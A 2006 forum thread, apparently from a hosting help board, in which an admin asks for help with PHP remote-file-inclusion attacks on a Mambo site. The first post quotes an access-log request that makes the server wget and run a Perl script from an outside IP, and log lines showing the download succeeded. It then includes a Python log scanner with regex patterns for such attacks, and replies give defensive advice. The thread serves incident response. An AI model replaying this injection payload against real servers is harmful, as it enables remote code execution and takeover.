#1
Old 16th July 2006, 01:15
Grizzly
php script injections

My server is being attacked by script injections. I have already chmod'ed wget, but the attacks still continue and seem to be getting more advanced. I need help securing the server.

Extract from logfile /var/log/apache2/access_log:

82.77.174.39 - - [16/Jul/2006:00:33:30 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.90.88.178/tool.gif?&cmd=cd%20/tmp/;wget%20http://66.90.88.178/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 404 1181 "-" "Mozilla/5.0"

Extract from logfile /var/log/apache2/error_log:

[Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
[Sat Jul 15 22:20:45 2006] [error] an unknown filter was not added: PHP
--22:20:55-- http://66.90.88.178/mambo.txt
=> `mambo.txt'
Connecting to 66.90.88.178:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16,282 (16K) [text/plain]

0K .......... ..... 100% 7.77 KB/s

22:20:58 (7.77 KB/s) - `mambo.txt' saved [16282/16282]

kill: usage: kill [-s sigspec | -n signum | -sigspec] [pid | job]... or kill -l [sigspec]
[Sat Jul 15 22:41:53 2006] [warn] child process 13552 still did not exit, sending a SIGTERM
[Sat Jul 15 22:41:53 2006] [warn] child process 30607 still did not exit, sending a SIGTERM

Need help, advice, anything...

Thank you in advance
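A detection pass over access_log lines of the kind quoted above, as an added example that is not part of the original thread. It parses each request's query string and flags the three signs visible in the logged request: parameter names that try to override PHP globals or the mosConfig_absolute_path setting, a remote URL supplied as a parameter value, and a chained shell command. The second and third sample lines and the 10.0.0.x addresses are constructed; the third shows that a remote URL on its own is only a weak signal and needs the other indicators (or a matching error_log entry like the wget output above) before you treat it as a successful include.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample in Apache "combined" format. Line 1 is the request quoted
# in the thread; lines 2 and 3 are constructed for contrast.
SAMPLE_LOG = r'''
82.77.174.39 - - [16/Jul/2006:00:33:30 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.90.88.178/tool.gif?&cmd=cd%20/tmp/;wget%20http://66.90.88.178/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 404 1181 "-" "Mozilla/5.0"
10.0.0.5 - - [16/Jul/2006:00:35:02 +0200] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.6 - - [16/Jul/2006:00:36:10 +0200] "GET /index.php?url=http://example.org/page HTTP/1.1" 200 900 "-" "Mozilla/5.0"
'''

# client ident user [time] "method target protocol" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
# A parameter value that is itself a remote URL (what an RFI needs).
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# A downloader/interpreter name preceded by a separator, i.e. a command chain.
SHELL_CHAIN_RE = re.compile(r'(?:^|[;|\s])(?:wget|curl|perl|sh|bash)\s+\S',
                            re.IGNORECASE)
# Keys used to smuggle values past register_globals into the Mambo config.
GLOBAL_OVERRIDE_KEYS = ("GLOBALS", "_REQUEST[", "_GET[", "_POST[",
                        "mosConfig_absolute_path")


def parse_query(query):
    """Split a raw query string on '&' only (older parse_qsl also split on ';',
    which would hide the chained command) and decode each key and value."""
    pairs = []
    for field in query.split("&"):
        if field:
            key, _, value = field.partition("=")
            pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def analyse_request(target):
    """Return [(rule, parameter)] findings for one request target; [] if clean."""
    findings = []
    for key, value in parse_query(urlsplit(target).query):
        if key.startswith(GLOBAL_OVERRIDE_KEYS):
            findings.append(("global-override", key))
        if REMOTE_URL_RE.match(value):
            findings.append(("remote-url", key))
        if SHELL_CHAIN_RE.search(value):
            findings.append(("shell-chain", key))
    return findings


def scan_log(text):
    """Return (client_ip, status, findings) for every line that triggers a rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (findings := analyse_request(m.group("target"))):
            hits.append((m.group("ip"), int(m.group("status")), findings))
    return hits
```

The 404 on the first line says nothing about whether the include ran; the wget transcript in error_log is the evidence that it did.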
#2
Old 16th July 2006, 09:11
sjau

You could deny the IP of the attacker in a .htaccess.
#3
Old 16th July 2006, 09:48
TheRudy

Remove the script ASAP. Contact the author of the script and tell them about this if you haven't written it yourself. You might also check for updates. Denying the IP won't solve it, because he can use a different server and voilà, you get hacked again.

I would lock down the server until it's checked out. Run chkrootkit and rkhunter (not sure if they detect this script, but it can't hurt running them). An antivirus scan can't hurt either.

Btw, Mambo is a VERY buggy application. I would suggest you switch to Joomla if you want the same interface and stuff. I think you can even upgrade from Mambo to Joomla.
#4
Old 16th July 2006, 09:53
edge

http://66.90.88.178/mambo.txt is already giving me a virus warning!

I like the "main" site :-)
#5
Old 16th July 2006, 10:13
TheRudy

Quote:
Originally Posted by edge
http://66.90.88.178/mambo.txt is already giving me a virus warning!

I like the "main" site :-)
You also checked that eh?
#6
Old 16th July 2006, 10:46
Grizzly
Can't find the scripts on my site

I can't seem to find the script on my server. I've installed rkhunter and updated + scanned the system. Found nothing.

66.90.88.178 is not my site; it's just that my server is being told to get these scripts from various sites, including the one mentioned, and then run them. When I check my running processes I find a lot of https instances which don't make any sense to me. I've tried looking for help on installing mod_security on my SUSE 10 server, but had no luck. Not too sure if it's safe to install when running ISPConfig with SUSE 10 using the perfect setup from HowtoForge.

I have also updated to the latest patches from SUSE. These scripts are also being run on domains that I have since made dormant, with nothing in the actual /var/www/web#/web folder. When I check my logs, even they are being used to download these scripts, which is strange since before ISPConfig was installed I chmod 700 wget.